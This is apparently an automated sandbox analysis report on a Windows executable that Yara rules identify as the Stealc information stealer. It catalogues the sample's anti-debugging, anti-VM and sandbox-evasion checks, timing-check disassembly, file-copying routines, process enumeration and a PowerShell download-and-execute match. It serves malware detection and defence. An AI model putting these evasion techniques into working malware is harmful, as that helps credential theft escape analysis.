Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A495A8 second address: A495BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A495BE second address: A495C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A496DC second address: A496F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F7F147AEA46h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A4FEEB second address: A4FEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A57992 second address: A579B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59DD2 second address: A59DE0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A59DE0 second address: A59DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9948E1 second address: 9948FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F3A4 second address: A6F3E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F7F147AEA59h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F147AEA4Eh 0x00000013 jmp 00007F7F147AEA50h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A723DE second address: A723E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A00 second address: A73A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A0F second address: A73A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A13 second address: A73A2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 jc 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A2E second address: A73A3C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A73A3C second address: A73A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7B83C second address: A7B850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A393 second address: A7A397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A397 second address: A7A3CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F1511CE39h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3CC second address: A7A3E8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F7F147AEA46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3E8 second address: A7A3EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A3EC second address: A7A3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 996482 second address: 996488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F87F second address: A7F883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F883 second address: A7F8A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F7F1511CE3Ah 0x0000000e jmp 00007F7F1511CE34h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7F8A5 second address: A7F8BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA50h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FA82 second address: A7FAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE30h 0x00000009 popad 0x0000000a jmp 00007F7F1511CE33h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7FAAA second address: A7FAB4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9CC51 second address: A9CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE2Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E97A second address: A9E97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A9E97E second address: A9E984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAD717 second address: AAD721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE2D second address: AADE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F1511CE26h 0x0000000a jl 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE3E second address: AADE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AADE48 second address: AADE52 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F1511CE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE10C second address: AAE112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AAE242 second address: AAE24C instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB109A second address: AB10B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3CF0 second address: AB3CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3CF5 second address: AB3D00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F7F147AEA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F4A second address: AB3F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F4E second address: AB3F54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3F54 second address: AB3FC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7F1511CE35h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 call 00007F7F1511CE2Bh 0x00000015 jnp 00007F7F1511CE29h 0x0000001b adc dh, FFFFFF8Fh 0x0000001e pop edx 0x0000001f push dword ptr [ebp+122D2971h] 0x00000025 jnc 00007F7F1511CE36h 0x0000002b push 29A5B6F5h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F7F1511CE37h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3FC5 second address: AB3FCF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB3FCF second address: AB3FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB7376 second address: AB737A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AB737A second address: AB738C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F7F1511CE2Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480239 second address: 5480248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480248 second address: 548024E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548024E second address: 5480252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480252 second address: 548028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7F1511CE2Ah 0x00000010 or ch, FFFFFFF8h 0x00000013 jmp 00007F7F1511CE2Bh 0x00000018 popfd 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 pushad 0x00000021 movsx edi, si 0x00000024 mov dx, cx 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edi, eax 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548028C second address: 54802B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F7F147AEA4Ah 0x0000000c xor ecx, 25DF0888h 0x00000012 jmp 00007F7F147AEA4Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54802B6 second address: 54802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 4364h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480346 second address: 548034C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548034C second address: 5480351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFDC1 second address: 9CFDE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F7F147AEA46h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CFDE3 second address: 9CFDE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 8219E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9C686F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9ECA21 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005D38B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005D4910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CDA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_005CE430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_005D4570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_005CED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_005CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CDE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005C16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005C16D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005CF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005CF6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005D3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_005D3EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C1160 GetSystemInfo,ExitProcess,

0_2_005C1160

Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2215149403.00000000014D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`\|P
Source: file.exe, 00000000.00000002.2215149403.0000000001505000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005C45C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005C45C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_005D9860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9750 mov eax, dword ptr fs:[00000030h]

0_2_005D9750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005D7850

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_005D9600

Source: file.exe, file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DjF=Program Manager
Source: file.exe, 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: oDjF=Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_005D7B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_005D6920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_005D7850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005D7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_005D7A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2215149403.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2161251258.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

ID:	1532741
Product:	CloudBasic
Start time:	21:03:08
Start date:	13.10.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	054dffcd797e0e40c9e7b3050814f148
SHA1:	d5d545a246bb31a238e4a2632bdc878a35bd8d7e
SHA256:	6dbfc677cbb25ac652a97431f9afc4811639b3dae9b640976c0b9bb8d9a54404
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by